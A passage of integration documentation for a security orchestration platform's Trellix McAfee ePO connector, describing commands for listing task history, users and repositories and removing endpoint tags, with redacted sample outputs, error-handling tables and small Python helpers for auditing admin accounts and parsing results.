\\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:53-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  
\\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-16T16:04:54-08:00\\\"\\r\\n \\r\\n ]\"",
    "status": "\"[\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\"\\r\\n \\r\\n ]\"",
    "taskSource": "\"[\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"scheduler\\\",\\r\\n \\r\\n  \\\"scheduler\\\",\\r\\n \\r\\n  \\\"scheduler\\\",\\r\\n \\r\\n  \\\"scheduler\\\",\\r\\n \\r\\n  \\\"scheduler\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"accountSyncStatusTaskSource\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\"\\r\\n \\r\\n ]\"",
    "userName": "\"[\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| id | name | startDate | endDate | userName | status | taskSource | duration |
|---|---|---|---|---|---|---|---|
| 1*****5 | Threat Detected | 12/30/2019 1:58:42 PM | 12/30/2019 1:58:42 PM | system | Completed | response | Less than a minute |
| 1*****8 | Threat Detected | 12/30/2019 1:58:42 PM | 12/30/2019 1:58:43 PM | system | Completed | response | Less than a minute |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Task History failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List Task History failed.

Status Code: 401.

Message: Unauthorized.

List User

Retrieves a list of all users.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": 1,
        "name": "admin",
        "fullName": "",
        "email": "",
        "phoneNumber": "",
        "disabled": false,
        "admin": true,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    },
    {
        "id": *****,
        "name": "*****",
        "fullName": "",
        "email": "",
        "phoneNumber": "",
        "disabled": false,
        "admin": false,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    },
    {
        "id": *****,
        "name": "*****",
        "fullName": "",
        "email": "",
        "phoneNumber": "",
        "disabled": true,
        "admin": true,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    },
    {
        "id": *****,
        "name": "*****",
        "fullName": "Test User",
        "email": "test@example.com",
        "phoneNumber": "",
        "disabled": false,
        "admin": true,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    }
]
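A check a playbook could run on the List User Raw Data to surface administrator accounts worth reviewing. This is an added example, not D3 or Trellix code: the records are constructed, the names `audit_users` and `SAMPLE_RAW_DATA` are hypothetical, and reading `authType` `pwd` as password login and an empty `allowedIPs` as no source-IP restriction are assumptions.

```python
import json

# Constructed records in the shape of the List User Raw Data sample
# (names, ids and the IP range are made up).
SAMPLE_RAW_DATA = """
[
  {"id": 1,   "name": "admin",        "disabled": false, "admin": true,  "authType": "pwd", "allowedIPs": ""},
  {"id": 101, "name": "soc-readonly", "disabled": false, "admin": false, "authType": "pwd", "allowedIPs": ""},
  {"id": 102, "name": "old-admin",    "disabled": true,  "admin": true,  "authType": "pwd", "allowedIPs": ""},
  {"id": 103, "name": "ir-lead",      "disabled": false, "admin": true,  "authType": "pwd", "allowedIPs": "10.0.0.0/24"}
]
"""


def audit_users(raw_data):
    """Return (name, finding) tuples for administrator accounts that merit review."""
    users = json.loads(raw_data) if isinstance(raw_data, str) else raw_data
    findings = []
    for user in users:
        if not user.get("admin"):
            continue  # only administrator accounts are in scope here
        name = user.get("name", "<unnamed>")
        if user.get("disabled"):
            # Disabled but still flagged admin: a candidate for cleanup.
            findings.append((name, "disabled-admin"))
            continue
        # Assumption: an empty allowedIPs value means no source-IP restriction,
        # and authType "pwd" means password login.
        unrestricted = not str(user.get("allowedIPs") or "").strip()
        if user.get("authType") == "pwd" and unrestricted:
            findings.append((name, "enabled-admin-password-no-ip-limit"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_users(SAMPLE_RAW_DATA):
        print(f"{name}: {finding}")
```
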
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": 1,
        "name": "admin",
        "fullName": "",
        "email": "",
        "phoneNumber": "",
        "disabled": false,
        "admin": true,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    },
    {
        "id": *****,
        "name": "*****",
        "fullName": "",
        "email": "",
        "phoneNumber": "",
        "disabled": false,
        "admin": false,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    },
    {
        "id": *****,
        "name": "*****",
        "fullName": "",
        "email": "",
        "phoneNumber": "",
        "disabled": true,
        "admin": true,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    },
    {
        "id": *****,
        "name": "*****",
        "fullName": "Test User",
        "email": "test@example.com",
        "phoneNumber": "",
        "disabled": false,
        "admin": true,
        "authType": "pwd",
        "authDetails": "",
        "notes": "",
        "allowedIPs": ""
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"id\\\": 1,\\r\\n        \\\"name\\\": \\\"admin\\\",\\r\\n        \\\"fullName\\\": \\\"\\\",\\r\\n        \\\"email\\\": \\\"\\\",\\r\\n        \\\"phoneNumber\\\": \\\"\\\",\\r\\n        \\\"disabled\\\": false,\\r\\n        \\\"admin\\\": true,\\r\\n        \\\"authType\\\": \\\"pwd\\\",\\r\\n        \\\"authDetails\\\": \\\"\\\",\\r\\n        \\\"notes\\\": \\\"\\\",\\r\\n        \\\"allowedIPs\\\": \\\"\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": 4,\\r\\n        \\\"name\\\": \\\"defaultDxlUser\\\",\\r\\n        \\\"fullName\\\": \\\"\\\",\\r\\n        \\\"email\\\": \\\"\\\",\\r\\n        \\\"phoneNumber\\\": \\\"\\\",\\r\\n        \\\"disabled\\\": true,\\r\\n        \\\"admin\\\": true,\\r\\n        \\\"authType\\\": \\\"pwd\\\",\\r\\n        \\\"authDetails\\\": \\\"\\\",\\r\\n        \\\"notes\\\": \\\"\\\",\\r\\n        \\\"allowedIPs\\\": \\\"\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"id\\\": 2,\\r\\n        \\\"name\\\": \\\"system\\\",\\r\\n        \\\"fullName\\\": \\\"\\\",\\r\\n        \\\"email\\\": \\\"\\\",\\r\\n        \\\"phoneNumber\\\": \\\"\\\",\\r\\n        \\\"disabled\\\": true,\\r\\n        \\\"admin\\\": true,\\r\\n        \\\"authType\\\": \\\"pwd\\\",\\r\\n        \\\"authDetails\\\": \\\"\\\",\\r\\n        \\\"notes\\\": \\\"\\\",\\r\\n        \\\"allowedIPs\\\": \\\"\\\"\\r\\n    }\\r\\n]\"",
    "admin": "\"[\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\"",
    "authType": "\"[\\r\\n \\r\\n  \\\"pwd\\\",\\r\\n \\r\\n  \\\"pwd\\\",\\r\\n \\r\\n  \\\"pwd\\\",\\r\\n \\r\\n  \\\"pwd\\\",\\r\\n \\r\\n  \\\"pwd\\\",\\r\\n \\r\\n  \\\"pwd\\\",\\r\\n \\r\\n  \\\"pwd\\\"\\r\\n \\r\\n ]\"",
    "disabled": "\"[\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\"",
    "email": "\"[\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\" ]\"",
    "fullName": "\"[\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"Michael Xu\\\",\\r\\n \\r\\n  \\\"demo mcafee\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\"\\r\\n \\r\\n ]\"",
    "id": "\"[\\r\\n \\r\\n  1,\\r\\n \\r\\n  2036,\\r\\n \\r\\n  *****\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"***\\\",\\r\\n \\r\\n  \\\"*****\\\"]\"",
    "phoneNumber": "\"[\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\"\\r\\n \\r\\n ]\""
}
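The Key Fields samples store each value as JSON text wrapped in a JSON string, so a consumer has to peel several layers before it gets a list. The decoder below is an added example, not D3 code: the sample document is constructed in the same escaping as the samples above, and `unwrap`, `decode_key_fields` and `to_records` are hypothetical names. It also refuses to zip parallel arrays of different lengths and leaves redacted values such as `*****` undecoded.

```python
import json

# Constructed Key Fields document using the same escaping as the samples above.
# "id" keeps a ***** redaction to show the undecodable case; "Status" is a scalar.
SAMPLE_KEY_FIELDS = r'''
{
    "admin": "\"[\\r\\n \\r\\n  true,\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "disabled": "\"[\\r\\n \\r\\n  false,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"admin\\\",\\r\\n \\r\\n  \\\"example-user\\\"\\r\\n \\r\\n ]\"",
    "id": "\"[\\r\\n \\r\\n  1,\\r\\n \\r\\n  *****\\r\\n \\r\\n ]\"",
    "Status": "\"Tag EXAMPLE has been removed from 1 endpoint(s) successfully.\""
}
'''


def unwrap(value, max_layers=5):
    """Peel nested JSON-string layers; stop at the first layer that is not JSON."""
    for _ in range(max_layers):
        # Only strings that look like a JSON string, array or object are decoded,
        # so plain text such as a status message is returned unchanged.
        if not isinstance(value, str) or value.lstrip()[:1] not in ('"', "[", "{"):
            break
        try:
            value = json.loads(value)
        except ValueError:
            break  # redacted or malformed content stays as text
    return value


def decode_key_fields(key_fields):
    """Parse the Key Fields document and unwrap every value."""
    doc = json.loads(key_fields) if isinstance(key_fields, str) else key_fields
    return {key: unwrap(value) for key, value in doc.items()}


def to_records(decoded, fields):
    """Zip parallel arrays into per-item records, only if they line up."""
    columns = [decoded.get(field) for field in fields]
    if not all(isinstance(column, list) for column in columns):
        raise ValueError("a requested field did not decode to a list")
    if len({len(column) for column in columns}) != 1:
        raise ValueError("parallel arrays differ in length; cannot pair values")
    return [dict(zip(fields, row)) for row in zip(*columns)]


if __name__ == "__main__":
    decoded = decode_key_fields(SAMPLE_KEY_FIELDS)
    for record in to_records(decoded, ["name", "admin", "disabled"]):
        print(record)
```
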
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

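| id | name | fullName | email | phoneNumber | disabled | admin | authType | authDetails | notes | allowedIPs |
|---|---|---|---|---|---|---|---|---|---|---|
| 1 | admin | | | | False | True | pwd | | | |
| 2*** | a*** | | | | False | False | pwd | | | |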

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List User failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List User failed.

Status Code: 401.

Message: Unauthorized.

Remove Tag

Removes tags from endpoints in ePO.

Reader Note

  • Tag Name is a required parameter to run this command.

    • Run the Find Tag command to obtain Tag Name. Tag Names can be found from the returned raw data at the path $[*].tagName.

  • In the case that the provided tag information does not exist, the following message will be returned: "Tag SERVER has been successfully removed from 0 endpoint(s)."

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Endpoints | Required | The endpoints from which to remove tags. | dc_auto_*** |
| Tag Name | Required | The names of the tags to remove from the specified endpoints. Tag name can be obtained using the Find Tag command. | YABINGUO |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "Status": "Tag DC_AUTO_MTRG has been removed from 1 endpoint(s) successfully."
}
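The Reader Note's zero-endpoint message reads like a success, so a playbook that depends on the tag actually being removed should check the count in `Status`. The parser below is an added example, not D3 code: `check_remove_tag` and its `requested` parameter are hypothetical, and it accepts only the two message wordings shown on this page.

```python
import json
import re

# Matches both wordings on this page:
#   "Tag SERVER has been successfully removed from 0 endpoint(s)."
#   "Tag DC_AUTO_MTRG has been removed from 1 endpoint(s) successfully."
STATUS_RE = re.compile(
    r"^Tag (?P<tag>.+?) has been (?:successfully )?removed from "
    r"(?P<count>\d+) endpoint\(s\)(?: successfully)?\.$"
)


def check_remove_tag(raw_data, requested=None):
    """Classify a Remove Tag result as removed, partial, no-op or unrecognized.

    raw_data  -- the Raw Data object (dict or JSON text) with a "Status" key
    requested -- optional number of endpoints passed in the Endpoints input
    """
    doc = json.loads(raw_data) if isinstance(raw_data, str) else raw_data
    status = str(doc.get("Status", "")).strip()
    match = STATUS_RE.match(status)
    if match is None:
        # Unknown wording: do not guess, let the playbook route to manual review.
        return {"tag": None, "removed": None, "verdict": "unrecognized"}
    removed = int(match.group("count"))
    if removed == 0:
        verdict = "no-op"      # tag or endpoint did not match anything
    elif requested is not None and removed < requested:
        verdict = "partial"    # fewer endpoints changed than were requested
    else:
        verdict = "removed"
    return {"tag": match.group("tag"), "removed": removed, "verdict": verdict}


if __name__ == "__main__":
    samples = [
        '{"Status": "Tag DC_AUTO_MTRG has been removed from 1 endpoint(s) successfully."}',
        '{"Status": "Tag SERVER has been successfully removed from 0 endpoint(s)."}',
    ]
    for sample in samples:
        print(check_remove_tag(sample))
```
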
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "Status": "Tag DC_AUTO_*** has been removed from 1 endpoint(s) successfully."
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"{\\r\\n \\r\\n  \\\"Status\\\": \\\"Tag DC_AUTO_*** has been removed from 1 endpoint(s) successfully.\\\"\\r\\n \\r\\n }\"",
    "Status": "\"Tag DC_AUTO_*** has been removed from 1 endpoint(s) successfully.\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

Status

Tag DC_AUTO_*** has been removed from 1 endpoint(s) successfully.

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Remove Tag failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Remove Tag failed.

Status Code: 401.

Message: Unauthorized.

Repo List

Retrieves a list of repositories.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "*****-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "*****-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"SAServerDNS\\\":\\\"\\\",\\\"disableV1DATReplication\\\":false,\\\"spipeServerDNS\\\":null,\\\"repositoryTypeString\\\":\\\"master\\\",\\\"useAnonCreds\\\":false,\\\"downloadCredPassword\\\":\\\"\\\",\\\"downloadCredDomain\\\":\\\"\\\",\\\"lockType\\\":0,\\\"enabled\\\":true,\\\"uncUseLoggedOnUser\\\":false,\\\"uncOrder\\\":\\\"1\\\",\\\"protocol\\\":1,\\\"lockedBy\\\":\\\"\\\",\\\"softwareInclusionList\\\":[],\\\"uploadCredUsername\\\":\\\"\\\",\\\"spipeVersion\\\":\\\"4.5.0\\\",\\\"SAServerNetbios\\\":\\\"\\\",\\\"protocolString\\\":\\\"SpipeSite\\\",\\\"disableFullDATReplication\\\":false,\\\"replicationUNC\\\":\\\"\\\",\\\"SAServerIP\\\":\\\"\\\",\\\"addressType\\\":null,\\\"autoID\\\":3,\\\"softwareExclusionList\\\":null,\\\"repositoryTypeAsString\\\":null,\\\"repositoryName\\\":\\\"ePO_McAfeeEPO510\\\",\\\"spipeServerName\\\":\\\"McAfeeEPO510\\\",\\\"uploadCredDomain\\\":\\\"\\\",\\\"repositoryPort\\\":80,\\\"downloadPasswordEncrypted\\\":true,\\\"httpUseAuth\\\":f